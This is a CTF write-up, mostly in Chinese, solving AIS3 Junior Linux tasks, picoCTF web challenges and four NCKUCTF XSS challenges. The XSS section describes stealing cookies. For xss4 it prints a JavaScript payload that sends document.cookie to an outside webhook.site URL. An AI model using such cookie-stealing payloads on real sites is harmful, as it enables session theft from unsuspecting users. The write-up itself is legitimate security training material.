AIS3 Junior2025 Frontend Write UP

# AIS3 Junior2025 Frontend Write UP ## Linux ### challenge-1 ![image](https://hackmd.io/_uploads/BkgoglIueg.png) step 1. ls輸出 step 2. 進入challenge-1 step 3. 再次ls 找到flag step 4. cat flag Flag: `AIS3{C0N9_Y0UR_F1R57_F1A9_😼}` ### challenge-2 ![image](https://hackmd.io/_uploads/ByZJGlIdee.png) step1. cd challenge-2 step2. ls(沒資料) step3. ls -a(找隱藏資料) step4. cat .flag Flag: AIS3{15_a1_W0N7_M155_D07_🚩} ### challenge-3 ![螢幕擷取畫面 2025-08-10 163224](https://hackmd.io/_uploads/BkvRNgIOeg.png) 根據提示 touch 在 /tmp即可 ### challenge-4 ![螢幕擷取畫面 2025-08-10 163633](https://hackmd.io/_uploads/B1TBrx8deg.png) 根據提示， mv grep到challenge-5 即可 ### challenge-5 ![螢幕擷取畫面 2025-08-10 170103](https://hackmd.io/_uploads/BJa3SxUdel.png) ![螢幕擷取畫面 2025-08-10 170129](https://hackmd.io/_uploads/H1anreUugl.png) ![螢幕擷取畫面 2025-08-10 170240](https://hackmd.io/_uploads/r1p2Se8dgl.png) 用find 炸出來 ### challenge-6 ![螢幕擷取畫面 2025-08-10 182836](https://hackmd.io/_uploads/HypyUe8_le.png) ![螢幕擷取畫面 2025-08-10 182821](https://hackmd.io/_uploads/r1T1IgIOeg.png) 根據題目rm flag，即可得到flag --- ## picoctf(WEB) ### GET aHEAD Description Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:34561/ ![螢幕擷取畫面 2025-08-10 184342](https://hackmd.io/_uploads/B1SrugIOlg.png) GET --> HEAD就出來啦 Flag: `picoCTF{r3j3ct_th3_du4l1ty_8f878508}` ### Cookies Description Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:27177/ ![螢幕擷取畫面 2025-08-10 184803](https://hackmd.io/_uploads/rkhuFeUOeg.png) ![螢幕擷取畫面 2025-08-10 184813](https://hackmd.io/_uploads/H13dYxI_el.png) ![螢幕擷取畫面 2025-08-10 184818](https://hackmd.io/_uploads/r1n_FeU_xx.png) ![螢幕擷取畫面 2025-08-10 184827](https://hackmd.io/_uploads/rynuYxIuex.png) ![螢幕擷取畫面 2025-08-10 184958](https://hackmd.io/_uploads/BJndYlLOlx.png) 發現cookie對應到不同cookie 測試到18時得到flag Flag: `picoCTF{3v3ry1_l0v3s_c00k135_064663be}` ### Inspect HTML Description Can you get the flag? Additional details will be available after launching your challenge instance. ![image](https://hackmd.io/_uploads/rksvqx8dxl.png) 一個字: 水!!!! Flag: `picoCTF{1n5p3t0r_0f_h7ml_1fd8425b}` ### Bookmarklet Description Why search for the flag when I can make a bookmarklet to print it for me? Browse here, and find the flag! ![螢幕擷取畫面 2025-08-10 185759](https://hackmd.io/_uploads/S1cbnxLOel.png) 在console 執行網頁給的 ``` javascript:(function() { var encryptedFlag = "àÒÆÞ¦È¬ëÙ£Ö�ÓÚåÛÑ¢ÕÓ�ÒËÉ§�©�í"; var key = "picoctf"; var decryptedFlag = ""; for (var i = 0; i < encryptedFlag.length; i++) { decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256); } alert(decryptedFlag); })() ``` Flag: `picoCTF{p@g3_turn3r_6bbf8953}` ### WebDecode Description Do you know how to use the web inspector? Additional details will be available after launching your challenge instance. ![image](https://hackmd.io/_uploads/rkY3peLdge.png) 在Burp Suite找 about 中的原始碼，有行很像編碼過: cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMWY4MzI2MTV9 經過 Base64解密，得到flag Flag: `picoCTF{web_succ3ssfully_d3c0ded_1f832615}` --- ## XSS ### xss1 url: https://chall.nckuctf.org:28124/ ![image](https://hackmd.io/_uploads/B1e_rkv_gl.png) 先用script測試 ![image](https://hackmd.io/_uploads/rkkKBkDulg.png) 發現alarm有反應，代表xss漏洞存在 ![image](https://hackmd.io/_uploads/SkyiS1P_gl.png) 開啟webhook ![image](https://hackmd.io/_uploads/ByQ-IJP_el.png) 插入fetch ![image](https://hackmd.io/_uploads/H1jSLyvdxg.png) webhook收到資料 ![image](https://hackmd.io/_uploads/BJFO8kvdxl.png) https不行 ![image](https://hackmd.io/_uploads/H1ecL1vulx.png) 改http ![image](https://hackmd.io/_uploads/HJZjLJPOxx.png) webhook收到餅乾啦! ### xss2 url: https://chall.nckuctf.org:28125/ ![image](https://hackmd.io/_uploads/SyvZ2JPuxl.png) 同樣手法 ![image](https://hackmd.io/_uploads/SJGj2JP_el.png) 看sorce code多了一個<script> ![image](https://hackmd.io/_uploads/Byz_pyPuge.png) 運用</script>關閉多餘的<script> ![image](https://hackmd.io/_uploads/r1PKTkw_ex.png) 成功(接著同 xss-1) ![image](https://hackmd.io/_uploads/BkBfC1Pull.png) ![image](https://hackmd.io/_uploads/HJy4C1Puxg.png) ![image](https://hackmd.io/_uploads/HJE8mxvOgl.png) ![image](https://hackmd.io/_uploads/r1UP7xDule.png) 好吃的cookie ### xss3 運用偽協定 ![image](https://hackmd.io/_uploads/Syddb8vulx.png) alert成功 ![image](https://hackmd.io/_uploads/SJknWUDOxl.png) ![image](https://hackmd.io/_uploads/rkQAZUDdxl.png) ![image](https://hackmd.io/_uploads/rJ72HLw_xe.png) 按下去送資料給webhook ![image](https://hackmd.io/_uploads/Hk-mMLDuel.png) ![image](https://hackmd.io/_uploads/r19wfLvOel.png) ![image](https://hackmd.io/_uploads/SyKSGUwOxl.png) cookie!!!!! ### xss4 ![image](https://hackmd.io/_uploads/BkDfuIwdgg.png) 先送看看 ![image](https://hackmd.io/_uploads/S15SdIw_gx.png) 送csp測試看看? ![image](https://hackmd.io/_uploads/H1BjuIPOxx.png) 抓! `script-src 'nonce-MjcyNjg5'` 拿講師範本改 ``` document.addEventListener("DOMContentLoaded", function () { fetch(`https://webhook.site/d00ad947-5225-4239-b3cb-e32dabdf4185?a=${document.cookie}`) const button = document.getElementById("showTimeButton"); button.addEventListener("click", function () { displayCurrentTime(); }); function displayCurrentTime() { const now = new Date(); const timeString = now.toLocaleTimeString(); document.getElementById("timeDisplay").innerText = "現在時間: " + timeString; } }); ``` py機器出去就有啦: `NCKUCTF{b453-url_w1ll_n07_f4llb4ck_70_d3f4ul7-5rc}`